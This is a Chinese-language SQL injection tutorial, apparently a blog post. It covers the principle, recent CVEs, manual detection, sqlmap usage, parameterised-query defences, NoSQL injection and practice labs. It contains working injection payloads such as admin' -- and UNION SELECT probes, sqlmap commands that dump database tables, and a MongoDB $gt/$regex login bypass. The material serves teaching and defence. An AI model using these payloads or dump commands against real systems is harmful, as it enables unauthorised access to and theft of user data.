1. SQL注入是什么？原理其实很简单#

Web应用通常需要和数据库交互。比如登录功能，后端可能会写这样的SQL：

1
SELECT * FROM users WHERE username = 'johndoe' AND password = 'mypassword'

这个查询会去数据库里找用户名和密码都匹配的用户，找到了就放行。问题出在，如果应用直接把你输入的东西拼到SQL里，攻击者就可以“劫持”这条查询。

攻击者在用户名框里输入：

1
admin' --

SQL会变成：

1
SELECT * FROM users WHERE username = 'admin' -- ' AND password = 'whatever'

--在SQL里是注释符号。原本的密码验证条件被整个注释掉了，攻击者不需要密码就能以admin身份登录。这条经典语句叫万能密码绕过：' OR '1'='1，因为1=1永远为真，攻击者同样能绕过验证，还能把整个用户表的数据拖出来。

如果应用直接拼接字符串生成SQL，攻击者就能通过精心构造的输入改变SQL语句的语义。这就是SQL注入的本质：代码和数据混在一起了。

2. 2025-2026年SQL注入为什么还是热门？#

MITRE 2025年发布的CWE Top 25榜单里，SQL注入（CWE-89）排第二，得分28.72。XSS第一，SQL注入第二，CSRF第三——Web安全的“三巨头”依然稳坐前三。看几个2025-2026年真实曝出来的案例：

Django SQL注入（CVE-2026-1207），2026年2月公开，3月就被检测到在野利用。出问题的是Django的GeoDjango模块配合PostGIS后端时，RasterField的band索引参数处理存在缺陷。攻击者可以注入恶意SQL，绕过认证、访问用户数据、篡改数据库内容。截至2026年3月，CrowdSec检测到的攻击流量持续平稳，攻击者还在有选择地扫描使用了PostGIS的Django实例。这件事证明，即使是Django这种用了预编译语句的成熟框架，某些特定功能模块也可能出现SQL注入漏洞。

Payload CMS SQL注入（CVE-2026-34747），2026年4月公开，CVSS 8.5分（高危）。问题出在部分请求参数没有经过验证，攻击者可以在查询中注入恶意SQL代码，绕过权限控制，读取或修改数据库里的内容。修复版本3.79.1已发布。

New API SQL注入DoS（CVE-2026-25591），2026年2月公开。漏洞在/api/token/search接口，用户输入的keyword和token参数被直接拼接到SQL LIKE子句里，没有对通配符%和_做转义。攻击者可以用大量通配符构造搜索模式，强制数据库执行极其耗时的模式匹配，耗尽资源导致拒绝服务。

再看几个2025年的真实事件：

Devolutions Server（CVE-2025-13757），2025年12月公开，CVSS 9.4（严重）。日志机制中DateSortField参数存在SQL注入，已认证用户可以绕过安全控制，直接查询底层数据库，窃取所有存储的密码。官方已在2025.2.21及以上版本修复。

SuiteCRM双漏洞（CVE-2025-64492、CVE-2025-64493），2025年11月公开。第一个CVSS 8.8，基于时间的盲注漏洞，已认证用户可通过测量响应延迟来枚举数据库、提取哈希密码和客户数据；第二个影响GraphQL API，CVSS 6.5，任何已登录用户都能利用。已修复于8.9.1版本。

Catwatchful监控软件，2025年7月，安全研究员发现这款商业监控软件的服务器完全没有部署安全措施，通过简单的SQL注入就能获取包含6.2万用户明文凭证的数据库，管理员账号也在其中。

CNVD 2026年第11期漏洞周报显示，单周收录的476个漏洞里，0day漏洞占了64%（303个），其中就包括“Travel management System viewpackage.php文件SQL注入漏洞”等零日攻击漏洞。接到的涉及党政机关和企事业单位的漏洞总数高达5860个。

李宁（lining.com）某分站SQL注入漏洞（T00ls-2026-00009），2026年3月被安全研究者提交。这类知名网站的分站漏洞说明SQL注入仍然广泛存在于真实生产环境中。

3. SQL注入的常见类型#

入门阶段把UNION注入和报错注入练熟就够了，盲注可以用sqlmap自动完成。

4. 手动检测思路与技巧#

理解原理之后，手动测试SQL注入主要靠两件事：看服务器怎么反应 + 懂点SQL语法。

1
原始URL：http://example.com/page.php?id=1
2
试探URL：http://example.com/page.php?id=1'

1
http://example.com/page.php?id=1 and 1=1   → 正常
2
http://example.com/page.php?id=1 and 1=2   → 异常

1
id=1 ORDER BY 1 --  正常
2
id=1 ORDER BY 2 --  正常
3
id=1 ORDER BY 3 --  正常
4
id=1 ORDER BY 4 --  报错

1
id=-1 UNION SELECT 1,2,3 --

1
id=-1 UNION SELECT 1,database(),user() --

5. 自动化测试工具#

手动测一遍之后，用自动化工具做全面扫描。以下是2026年主流的几款工具：

1
# 基础检测
2
sqlmap -u "http://example.com/page.php?id=1"
3

4
# 获取数据库列表
5
sqlmap -u "http://example.com/page.php?id=1" --dbs
6

7
# 获取表名
8
sqlmap -u "http://example.com/page.php?id=1" -D database_name --tables
9

10
# 导出数据
11
sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name --dump
12

13
# POST请求注入
14
sqlmap -u "http://example.com/login.php" --data="user=admin&pass=123" --level=2
15

16
# 使用cookie（需要登录的情况）
17
sqlmap -u "http://example.com/page.php?id=1" --cookie="PHPSESSID=xxxxx"

6. 防御方案#

防御SQL注入的核心原则就一条：不要把用户输入直接拼到SQL语句里。

1
-- 用问号占位
2
SELECT * FROM users WHERE username = ? AND password = ?
3

4
-- 或者用命名占位符
5
SELECT * FROM users WHERE email = :email

1
String query = "SELECT * FROM users WHERE username = ? AND password = ?";
2
PreparedStatement stmt = connection.prepareStatement(query);
3
stmt.setString(1, username);
4
stmt.setString(2, password);
5
ResultSet rs = stmt.executeQuery();

1
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
2
$stmt->execute([$username, $password]);

1
query := "SELECT * FROM users WHERE username = ? AND password = ?"
2
rows, err := db.Query(query, username, password)

1
cursor.execute("SELECT * FROM users WHERE username = ?", (username,))

1
// PHP邮箱验证
2
$email = filter_input(INPUT_POST, 'email', FILTER_VALIDATE_EMAIL);
3

4
// 正则限制用户名格式
5
if (!preg_match('/^[a-zA-Z0-9_]{4,20}$/', $username)) {
6
    die('用户名格式无效');
7
}

7. NoSQL注入：新战场#

NoSQL数据库（MongoDB、Redis、Cassandra）不像传统SQL那样有固定的表结构，但也有自己的注入问题。

MongoDB查询用JSON格式传递。正常查询：

1
db.users.find({ "username": "admin", "password": "123456" })

攻击者可以构造恶意JSON：

1
db.users.find({ "username": { "$gt": "" }, "password": { "$regex": ".*" } })

$gt（大于空字符串）配合正则表达式.*会匹配所有用户，绕过认证。

MongoDB还有$where运算符允许执行JavaScript。攻击者可以注入恶意JS代码来窃取数据或破坏系统。

防御NoSQL注入的方法和SQL注入类似：使用参数化查询、验证用户输入、启用数据库认证机制。

8. 实战环境搭建#

想练手的话，这几个靶场最合适：

• PortSwigger Web Security Academy：官方提供的SQL注入实验室，包含各种注入类型的场景，有免费在线环境，每个实验都有详细教程和解题提示。
• DVWA (Damn Vulnerable Web Application)：本地搭建的PHP靶场，可以自己调难度级别。
• SQLi Labs：专为SQL注入设计的PHP靶场，覆盖了绝大多数注入类型。
• TryHackMe / HackTheBox：有完整的渗透测试路径，从SQL注入到提权一条龙。

本地用Docker跑DVWA最简单：

1
docker run --rm -p 80:80 vulnerables/web-dvwa

9. 常见问题排查#

10. 总结#

SQL注入从2000年代初到现在，二十多年了仍然活跃。它在2025年CWE Top 25排第二，2026年仍有Django、Payload CMS等主流软件爆出新漏洞。攻击手法没有变，防御手段也没有变——预编译语句今天仍然是防SQL注入最可靠的方法。

建议的学习路径：

1. 先手动搭一个DVWA本地靶场，把SQL注入的几种类型（UNION、报错、布尔盲注、时间盲注）各手动复现一遍
2. 再用sqlmap跑一遍，看自动化工具怎么工作
3. 去PortSwigger实验室刷题，那里有真实场景的在线靶场
4. 最后用Burp Suite或ZAP测一下自己写的代码，把“如何防御”落实到具体项目里

搞懂SQL注入，不仅防得住这一种漏洞，还能帮你理解AI时代的提示注入——问题的本质是一样的。这个理解，值了。

相关资源：

• PortSwigger SQL注入实验室：https://portswigger.net/web-security/sql-injection
• MITRE CWE Top 25榜单：https://cwe.mitre.org/top25/
• sqlmap项目：https://sqlmap.org
• OWASP SQL注入速查表：https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
• DVWA靶场：https://github.com/digininja/DVWA
• CNVD国家信息安全漏洞共享平台：https://www.cnvd.org.cn